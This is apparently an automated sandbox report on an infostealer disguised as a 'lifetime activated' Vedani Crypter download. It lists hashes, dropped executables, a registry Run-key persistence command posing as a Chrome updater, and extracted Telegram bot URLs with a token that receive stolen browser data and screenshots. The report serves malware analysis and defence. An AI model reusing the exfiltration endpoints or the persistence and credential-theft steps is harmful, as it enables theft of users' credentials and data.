Overview
overview
10Static
static
3Vedani-Cry...er.zip
windows7-x64
1Vedani-Cry...er.zip
windows10-2004-x64
1Vedani-Cry...ICENSE
windows7-x64
1Vedani-Cry...ICENSE
windows10-2004-x64
1Vedani-Cry...DME.md
windows7-x64
3Vedani-Cry...DME.md
windows10-2004-x64
3Vedani-Cry...al.mp4
windows7-x64
1Vedani-Cry...al.mp4
windows10-2004-x64
6Vedani-Cry...er.exe
windows7-x64
7Vedani-Cry...er.exe
windows10-2004-x64
10test.pyc
windows7-x64
3test.pyc
windows10-2004-x64
3Vedani-Cry...UI.dll
windows7-x64
1Vedani-Cry...UI.dll
windows10-2004-x64
1Vedani-Cry...on.exe
windows7-x64
9Vedani-Cry...on.exe
windows10-2004-x64
10Vedani-Cry...ce.exe
windows7-x64
1Vedani-Cry...ce.exe
windows10-2004-x64
1Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
01/09/2024, 14:03
Behavioral task
behavioral1
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter.zip
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/LICENSE
Resource
win7-20240705-en
Behavioral task
behavioral4
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/LICENSE
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/README.md
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/README.md
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/Tutorial.mp4
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/Tutorial.mp4
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/Vedani-Crypter.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/Vedani-Crypter.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
test.pyc
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
test.pyc
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/XanderUI.dll
Resource
win7-20240729-en
Behavioral task
behavioral14
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/XanderUI.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/libs/obsfucation.exe
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/libs/obsfucation.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/libs/source.exe
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/libs/source.exe
Resource
win10v2004-20240802-en
General
-
Target
Vedani-Crypter-Lifetime-Activated-vedani-crypter/Vedani-Crypter/Vedani-Crypter.exe
-
Size
6.2MB
-
MD5
f982e40c831cac8ad143723b49990772
-
SHA1
e50f97163936e22cf9012b883f73a0eeaf4d90ad
-
SHA256
13a169db433164fda1023703b80b6dba5fbd1bb1b2fa37a71a0749024f783c2b
-
SHA512
6c1de77ae2e5376515ad278abdd2d539e9200b3bf1640174e721fef9a9bb2e8f87766b1d62e54917aaea331b839bcba798ca50ba06fa4f0602f12a75bcd63cc7
-
SSDEEP
98304:RM3epzb71QGQCPDbZfHayCb7BJ5mjwNwwMeZYobSr+v+Z5OwXbJ:RMsdQmRfaycBIGpEogMwXb
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage?chat_id=2024893777
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates?offset=-
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation Vedani-Crypter.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation MkHelper.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 3 IoCs
pid Process 264 VedaniCrypter.exe 5036 MkHelper.exe 1324 Update.exe -
Loads dropped DLL 6 IoCs
pid Process 3128 Vedani-Crypter.exe 3128 Vedani-Crypter.exe 3128 Vedani-Crypter.exe 3128 Vedani-Crypter.exe 5036 MkHelper.exe 1324 Update.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogs\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 22 raw.githubusercontent.com 29 raw.githubusercontent.com 21 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 636 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 408 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1768 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 5036 MkHelper.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe 1324 Update.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5036 MkHelper.exe Token: SeDebugPrivilege 636 tasklist.exe Token: SeDebugPrivilege 1324 Update.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1324 Update.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3628 wrote to memory of 3128 3628 Vedani-Crypter.exe 85 PID 3628 wrote to memory of 3128 3628 Vedani-Crypter.exe 85 PID 3128 wrote to memory of 264 3128 Vedani-Crypter.exe 88 PID 3128 wrote to memory of 264 3128 Vedani-Crypter.exe 88 PID 3128 wrote to memory of 5036 3128 Vedani-Crypter.exe 91 PID 3128 wrote to memory of 5036 3128 Vedani-Crypter.exe 91 PID 5036 wrote to memory of 2332 5036 MkHelper.exe 95 PID 5036 wrote to memory of 2332 5036 MkHelper.exe 95 PID 2332 wrote to memory of 636 2332 cmd.exe 97 PID 2332 wrote to memory of 636 2332 cmd.exe 97 PID 2332 wrote to memory of 3300 2332 cmd.exe 98 PID 2332 wrote to memory of 3300 2332 cmd.exe 98 PID 2332 wrote to memory of 408 2332 cmd.exe 99 PID 2332 wrote to memory of 408 2332 cmd.exe 99 PID 2332 wrote to memory of 1324 2332 cmd.exe 100 PID 2332 wrote to memory of 1324 2332 cmd.exe 100 PID 1324 wrote to memory of 1652 1324 Update.exe 104 PID 1324 wrote to memory of 1652 1324 Update.exe 104 PID 1652 wrote to memory of 1768 1652 cmd.exe 106 PID 1652 wrote to memory of 1768 1652 cmd.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe"C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe"C:\Users\Admin\AppData\Local\Temp\Vedani-Crypter-Lifetime-Activated-vedani-crypter\Vedani-Crypter\Vedani-Crypter.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Users\Admin\AppData\Roaming\vedani\VedaniCrypter.exe"C:\Users\Admin\AppData\Roaming\vedani\VedaniCrypter.exe"3⤵
- Executes dropped EXE
PID:264
-
-
C:\Users\Admin\AppData\Roaming\registerCash\MkHelper.exe"C:\Users\Admin\AppData\Roaming\registerCash\MkHelper.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAA2A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAA2A.tmp.bat4⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 5036"5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Windows\system32\find.exefind ":"5⤵PID:3300
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak5⤵
- Delays execution with timeout.exe
PID:408
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe /f6⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogs\Update.exe /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:1768
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA25676fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA5120b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
-
Filesize
81KB
MD5bbe89cf70b64f38c67b7bf23c0ea8a48
SHA144577016e9c7b463a79b966b67c3ecc868957470
SHA256775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723
SHA5123ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1
-
Filesize
153KB
MD50a94c9f3d7728cf96326db3ab3646d40
SHA18081df1dca4a8520604e134672c4be79eb202d14
SHA2560a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31
SHA5126f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087
-
Filesize
812KB
MD5fbd6be906ac7cd45f1d98f5cb05f8275
SHA15d563877a549f493da805b4d049641604a6a0408
SHA256ae35709e6b8538827e3999e61a0345680c5167962296ac7bef62d6b813227fb0
SHA5121547b02875f3e547c4f5e15c964719c93d7088c7f4fd044f6561bebd29658a54ef044211f9d5cfb4570ca49ed0f17b08011d27fe85914e8c3ea12024c8071e8a
-
Filesize
4.3MB
MD5deaf0c0cc3369363b800d2e8e756a402
SHA13085778735dd8badad4e39df688139f4eed5f954
SHA256156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d
SHA5125cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989
-
Filesize
278B
MD5cb6e1c1ee278ebb9869a02f24abbf2a1
SHA171cca36cb35e8af73348825506e4e01384f279c6
SHA25695aa8860f35c604ad7ea4bb05525d9420444a463512b8b4be36e4dbc8a457f7a
SHA512939e3b1709708d41dc63cec3f1b99cc5e5b5be99e5f874889d8ff60fbda5f50d368e23a9c1d3500d0468389064ea8167884ed27e60eb92622b396032c21e59a0
-
Filesize
5.6MB
MD5612173309c257f2385cdc05c2f8f4ecc
SHA1e27c24d9a54df063a2cc22e687c9e5f08e0181cb
SHA256c9a0aea64ee81d3914980c968f2da7e45b17d008e81576b25fbc3c8415d1d899
SHA51279dad7c537b6573da25627c9379a562db337040c1f845e7cdb5cebe27c232f27476e2ab356353c571b617723aac61c869ebc1758615b32cad87fbfac1deb9d8b
-
Filesize
5.2MB
MD5e7b448f71bfabbcf84fc5f7c8cc219a6
SHA1fe5f861a03207da4fe6b4093bbdc5588e6a0fe07
SHA256522497cf6abdb91e9d64e0bc2f0ddedab87f74eefccb43a9fe222cf4bba570f0
SHA512c1a5f8008b5a421db803447d7b443c99bf081920347be1fa417279b3c1857362e262d32bab1b893684daa0cbb8a26735090d28efb188f81351889b7f56a48b06
-
Filesize
185KB
MD5b7498196f0a200cc729703e6127eb3cb
SHA11fb5e3127987b38c1e9309f7a65dd2f45a5f5754
SHA256cdf2ff8c0970f4144500c81c5678055ded70c05285ba3d3ff04e44fa78d9ce64
SHA5120922ebc190c7af93655c833b8e3ba3f98d49011dbbc822f633813d2e47db8b7f1a6a22fbfcb08d5fcebc11bd90a9d3392fe1c40af7391048c70d273ef17a86f1